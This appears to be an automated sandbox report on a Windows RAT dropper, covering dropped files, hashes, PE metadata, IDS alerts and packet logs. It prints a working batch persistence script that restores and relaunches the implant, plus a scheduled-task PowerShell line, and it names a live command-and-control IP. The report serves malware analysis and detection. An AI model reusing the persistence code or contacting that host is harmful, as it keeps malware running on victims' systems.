                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\backup.dll

                                                                                          Download File
                                                                                          Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):340760
                                                                                          Entropy (8bit):6.543041508104496
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:H66LUtNhlhaEDW8zn0iuAhzRgd5KrS8a1GJAlExz30/hUaCcM:H66LUtNrIAzCKzRgDKrSeGUalM
                                                                                          MD5:AC123A633FFD650E1C52DDEA5877D613
                                                                                          SHA1:D42AE3682768449EFFBAB0A2A80E074B31AC31EE
                                                                                          SHA-256:9FD0498B154F81BB9D25AF45CD6B73D01AE2570ADE3E273BCEFCC54FED4D4ECC
                                                                                          SHA-512:190BD111586DE3D276500116EF021CD19DBC1BC64124183041D258833D61329770E2FDFB83EF923FF28BE6C62A95A7A5B28A0B33564588DDED0D77B09F1BAB4E
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 48%
                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....mg...........!.........L......Y........................................p............@..........................t..O....t..........p6...............)...@...&...r.......................4.......................w...............................text............................... ..`.rdata..............................@..@.data....!..........................@....00cfg..............................@..@.tls................................@....rsrc...p6.......8..................@..@.reloc...&...@...(..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\backup.exe

                                                                                          Download File
                                                                                          Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):395368
                                                                                          Entropy (8bit):5.090673225697451
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:I0acLF3rgypB1Grf/TRfiJ7BePaEvLJggZy:Y/TRfi3ePtJRg
                                                                                          MD5:FB325C945A08D06FE91681179BDCCC66
                                                                                          SHA1:F5D91B7D75D34E156066AB4099E0FD0DF9227B32
                                                                                          SHA-256:0C2CC4513EC9101A28A7988C72A46175EFD82F387BB3BCFB2612E808804282B5
                                                                                          SHA-512:2BB588EBE2FA35D03652AEC4E5D51DABD3A24E996336A4D5EC9C762D6084862D5CD5F530F1DA0B98D2887BA88F4E077697D128071FF497D2967F9F42ADC2F533
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[...[...[...#l..[.......[.......[.......[.......[..b....[..e....[...0...[...[...[..e....[..e....[...[h..[..e....[..Rich.[..........................PE..L...X..e............................\........ ....@..................................8....@.................................D(.......@..................h(...........!..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0.......$..............@....rsrc........@.......&..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\monitor.bat

                                                                                          Download File
                                                                                          Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):769
                                                                                          Entropy (8bit):5.113976261619789
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:NFW/WAW/WAWE3fzWcWrfZKx31SIYaYZLZ6y:NFVAVAjvz6ZKx31SIYN/6y
                                                                                          MD5:F7F23953F7C236A0F12AE4848F174480
                                                                                          SHA1:E222C191BE437B39FB294EDD1FCCAF961B1F7265
                                                                                          SHA-256:0CD1B31F9AA2F089BD33331B172CD4813167BD59F889EFDC7EB2ADAA71F3D9CC
                                                                                          SHA-512:2790AFD071756E25FF408426E0D40879603EBCBC23C1D98AD891017237A2930F27CC19F28C38C5BAB5221E828B0B08727EDCEC1D2AA528FCCED0B7EE576836B8
                                                                                          Malicious:false
                                                                                          Preview:@echo off..:CheckProcess..set "ProcessName=Update.exe"..set "ProcessPath=C:\Users\Public\Bilite\Axialis\Update.exe"..set "BackupProcessPath=C:\Users\user\AppData\Local\Temp\\backup.exe"..set "DLLPath=C:\Users\Public\Bilite\Axialis\Update.dll"..set "BackupDLLPath=C:\Users\user\AppData\Local\Temp\\backup.dll"..if not exist "%ProcessPath%" (.. echo Process file not found, restoring from backup..... copy /Y "%BackupProcessPath%" "%ProcessPath%"..)..if not exist "%DLLPath%" (.. echo DLL file not found, restoring from backup..... copy /Y "%BackupDLLPath%" "%DLLPath%"..)..tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul..if %ERRORLEVEL% neq 0 (.. start "" "%ProcessPath%"..)..timeout /t 30 /nobreak >nul..goto CheckProcess..

                                                                                          C:\Users\user\AppData\Local\Temp\monitor.pid

                                                                                          Download File
                                                                                          Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4
                                                                                          Entropy (8bit):2.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:T:T
                                                                                          MD5:501627AA14E37BD1D4143159E0E9620F
                                                                                          SHA1:654F1EBEF4FDF2565E95150A45ABBE6CCB1B00EA
                                                                                          SHA-256:5EDD6B7BA99BE850AB24EF3ACBB3B0DE8F0DCB9A04E70B819B87AB641C88FAEE
                                                                                          SHA-512:F95D7562A6AA9E005B518671FA1A51D9589E416DEBC90905FB85588299963A79A61D3A2689946B1DE6C1088D176B6B20161C0E3AB86C78B5C8CFA8B5A1F26005
                                                                                          Malicious:false
                                                                                          Preview:4592

                                                                                          C:\Users\user\AppData\Local\updated.ps1

                                                                                          Download File
                                                                                          Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):151
                                                                                          Entropy (8bit):4.741657013789009
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                          MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                          SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                          SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                          SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                          Malicious:true
                                                                                          Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName

                                                                                          C:\Users\user\Desktop\360inst_install.exe.lnk

                                                                                          Download File
                                                                                          Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Jan 6 15:47:40 2025, mtime=Mon Jan 6 15:47:40 2025, atime=Tue Dec 24 07:21:34 2024, length=4118496, window=hide
                                                                                          Category:dropped
                                                                                          Size (bytes):1076
                                                                                          Entropy (8bit):4.678579704227469
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:85VE660UlGIICICHqXOcsw+XtACmqsIsPxgmhXaAjAsboWKD5GNXFav+RwP44t2W:85VEXG/+c9D7lAsC1v+RwIqyFm
                                                                                          MD5:3953F2E3270292CD2042E654ED784172
                                                                                          SHA1:797D4C1984313F0DB7D5E94EEB816654ED432B64
                                                                                          SHA-256:B04168D0CC70DF41BD2B20F7D0468E8ACE32FCEA5755B2B6B05204117C65A24A
                                                                                          SHA-512:610A21B541CE762E02E0416D71E8380087EAA2C65352FCCF608FE7910FA9B9E3B7A838D745880FA3427F1276CFFF23623662F4A5BFBF980DFD4854D2DF947F79
                                                                                          Malicious:false
                                                                                          Preview:L..................F.... ....F..Z`..ZW6.Z`..C.!..U....>..........................P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwH&Z.....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1.....&Z....Public..f......O.I&Z......+...............<.....0.Y.P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....T.1.....&Z....Bilite..>......&Z..&Z................................B.i.l.i.t.e.....t.2...>..Y.B .360INS~1.EXE..X......&Z..&Z......i......................^..3.6.0.i.n.s.t._.i.n.s.t.a.l.l...e.x.e.......Y...............-.......X...........pE._.....C:\Users\Public\Bilite\360inst_install.exe..'.....\.....\.P.u.b.l.i.c.\.B.i.l.i.t.e.\.3.6.0.i.n.s.t._.i.n.s.t.a.l.l...e.x.e..........v..*.cM.jVD.Es.!...`.......X.......405464...........hT..CrF.f4... .@.T..b...,.......hT..CrF.f4... .@.T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0

                                                                                          \Device\Null

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\timeout.exe
                                                                                          File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                          Category:dropped
                                                                                          Size (bytes):106
                                                                                          Entropy (8bit):4.319534830924389
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:hYFRZARcWmFsFJQZ/ctXvY/4to/9uF8cttEfYT:hYFRamFSQZ0lv5y/9JctE+
                                                                                          MD5:9D67FFD7743BE064B5D738D05280A1CE
                                                                                          SHA1:FF474A3BE27BF8FDB2A3A3F8900CE9CDC5059D6F
                                                                                          SHA-256:7A1612FA36FBE289B28A63A001157740C5CB50981AD9A99775BC15AEAE7AC8CA
                                                                                          SHA-512:3E5FE0510E91F93CA10868F82BDB96DAFA562B123FD0719EC9163A037BA44FCFBAFC35EF123F0BC041377CF0FFCB1859A32BA3E42F8058DE9AD68851E6122823
                                                                                          Malicious:false
                                                                                          Preview:..Waiting for 30 seconds, press CTRL+C to quit .....29..28..27..26..25..24..23..22..21..20..19..18..17..16

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.999887658095491
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:ErbgterT2R.exe
                                                                                          File size:73'541'183 bytes
                                                                                          MD5:14dfec5b51c4d87eacab495ad216eb7c
                                                                                          SHA1:fab7846b458694aecabf6770673615ae90493b5e
                                                                                          SHA256:b86af545e9a2f86c05538eb7fcb85cf63085a0730925a9587253d46590a4e4e9
                                                                                          SHA512:fa3d6adb59d1933ccb970cc291ba1bd92b1b796e04ffc00bfdc598f25838338d63fd337040712d313dc23a8adc5ea49a2b557696645793d00aa7f386fde78b1c
                                                                                          SSDEEP:1572864:nOSB3fJ9u57WcWNY8F378ntkdQaihnfyO5uBNLauCvMS4r:nOm4sxwmqlD5uvPeMB
                                                                                          TLSH:42F733573B493EAEE786F8B018760F8B1862C0952D1ACC22E1D415125DEBD1B0FA77E7
                                                                                          File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................................0....@..........................@...............................................P......................'.a..).

                                                                                          File Icon

                                                                                          Icon Hash:01e0f2ccd4d4c400

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x411def
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:true
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:
                                                                                          Time Stamp:0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:b5a014d7eeb4c2042897567e1288a095

                                                                                          Authenticode Signature

                                                                                          Signature Valid:false
                                                                                          Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                          Error Number:-2146869232
                                                                                          Not Before, Not After
                                                                                          • 18/07/2022 01:00:00 18/07/2024 00:59:59
                                                                                          Subject Chain
                                                                                          • CN=Incredibuild Software Ltd., O=Incredibuild Software Ltd., S=Tel Aviv, C=IL
                                                                                          Version:3
                                                                                          Thumbprint MD5:8164525B12F9B6829CCD5054865F2D41
                                                                                          Thumbprint SHA-1:583F01EE72450A9945FB1CFA539BAAB983D3F1D9
                                                                                          Thumbprint SHA-256:2EBD549CFBD28201F8773F370E920A21BB010F577BA74B4726332D2CE7836F69
                                                                                          Serial:7098774ED29B0565AB114EF2F2871CF7

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          push FFFFFFFFh
                                                                                          push 00414C50h
                                                                                          push 00411F80h
                                                                                          mov eax, dword ptr fs:[00000000h]
                                                                                          push eax
                                                                                          mov dword ptr fs:[00000000h], esp
                                                                                          sub esp, 68h
                                                                                          push ebx
                                                                                          push esi
                                                                                          push edi
                                                                                          mov dword ptr [ebp-18h], esp
                                                                                          xor ebx, ebx
                                                                                          mov dword ptr [ebp-04h], ebx
                                                                                          push 00000002h
                                                                                          call dword ptr [00413184h]
                                                                                          pop ecx
                                                                                          or dword ptr [00419924h], FFFFFFFFh
                                                                                          or dword ptr [00419928h], FFFFFFFFh
                                                                                          call dword ptr [00413188h]
                                                                                          mov ecx, dword ptr [0041791Ch]
                                                                                          mov dword ptr [eax], ecx
                                                                                          call dword ptr [0041318Ch]
                                                                                          mov ecx, dword ptr [00417918h]
                                                                                          mov dword ptr [eax], ecx
                                                                                          mov eax, dword ptr [00413190h]
                                                                                          mov eax, dword ptr [eax]
                                                                                          mov dword ptr [00419920h], eax
                                                                                          call 00007FBF854298E2h
                                                                                          cmp dword ptr [00417710h], ebx
                                                                                          jne 00007FBF854297CEh
                                                                                          push 00411F78h
                                                                                          call dword ptr [00413194h]
                                                                                          pop ecx
                                                                                          call 00007FBF854298B4h
                                                                                          push 00417048h
                                                                                          push 00417044h
                                                                                          call 00007FBF8542989Fh
                                                                                          mov eax, dword ptr [00417914h]
                                                                                          mov dword ptr [ebp-6Ch], eax
                                                                                          lea eax, dword ptr [ebp-6Ch]
                                                                                          push eax
                                                                                          push dword ptr [00417910h]
                                                                                          lea eax, dword ptr [ebp-64h]
                                                                                          push eax
                                                                                          lea eax, dword ptr [ebp-70h]
                                                                                          push eax
                                                                                          lea eax, dword ptr [ebp-60h]
                                                                                          push eax
                                                                                          call dword ptr [0041319Ch]
                                                                                          push 00417040h
                                                                                          push 00417000h
                                                                                          call 00007FBF8542986Ch

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x150dc0xb4.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x190d7.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x461fd270x2918
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x130000x310.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x113170x11400797279c5ab1a163aed1f2a528f9fe3ceFalse0.6174988677536232data6.576987441854239IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x130000x30ea0x32001359639b02bcb8f0a8743e6ead1c0030False0.43828125data5.549434098115495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0x170000x292c0x8009415c9c8dea3245d6d73c23393e27d8eFalse0.431640625data3.6583182363171756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rsrc0x1a0000x190d70x19200aedf42f084dabb70902985d8cb8d4f42False0.14223802860696516data4.481844282645869IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_ICON0x1a2080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.42819148936170215
                                                                                          RT_ICON0x1a6700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.2767354596622889
                                                                                          RT_ICON0x1b7180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600RussianRussia0.2513485477178423
                                                                                          RT_ICON0x1dcc00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896RussianRussia0.17170524326877656
                                                                                          RT_ICON0x21ee80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584RussianRussia0.09922512717378446
                                                                                          RT_GROUP_ICON0x327100x4cdataRussianRussia0.7763157894736842
                                                                                          RT_VERSION0x3275c0x350dataEnglishUnited States0.47523584905660377
                                                                                          RT_VERSION0x32aac0x3b0dataChineseChina0.4523305084745763
                                                                                          RT_MANIFEST0x32e5c0x27bASCII text, with very long lines (635), with no line terminatorsEnglishUnited States0.5118110236220472

                                                                                          Imports

                                                                                          DLLImport
                                                                                          COMCTL32.dll
                                                                                          KERNEL32.dllGetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
                                                                                          USER32.dllCharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
                                                                                          GDI32.dllGetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
                                                                                          SHELL32.dllSHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
                                                                                          ole32.dllCoInitialize, CreateStreamOnHGlobal, CoCreateInstance
                                                                                          OLEAUT32.dllVariantClear, OleLoadPicture, SysAllocString
                                                                                          MSVCRT.dll__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp

                                                                                          Possible Origin

                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          RussianRussia
                                                                                          EnglishUnited States
                                                                                          ChineseChina

                                                                                          Network Behavior

                                                                                          Suricata IDS Alerts

                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2025-01-06T17:48:56.323252+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449922134.122.155.3915091TCP
                                                                                          2025-01-06T17:50:05.766655+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449940134.122.155.3915091TCP

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 6, 2025 17:48:52.650891066 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:52.655781031 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:52.656006098 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.428291082 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.428350925 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.428361893 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.428374052 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.428395987 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.428395987 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.428409100 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.428420067 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.428432941 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.428438902 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.428443909 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.428456068 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.428457975 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.428489923 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.428513050 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.433370113 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.433382988 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.433394909 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.433404922 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.433435917 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.433480978 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.638819933 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.638899088 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.638920069 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.638935089 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.638951063 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.638966084 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.638972044 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.638972998 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.639013052 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.639164925 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.639286995 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.639302015 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.639326096 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.639343977 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.639348984 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.639362097 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.639381886 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.639384031 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.639413118 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.640239954 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.640258074 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.640270948 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.640281916 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.640292883 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.640304089 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.640322924 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.640362024 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.641064882 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.641077042 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.641088009 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.641134977 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.641149998 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.819063902 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.870521069 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.930265903 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930289030 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930299997 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930310011 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930320978 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930330992 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930341005 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930358887 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930365086 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.930433035 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:53.930753946 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930766106 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930777073 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930787086 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:53.930797100 CET1885249900134.122.155.39192.168.2.4
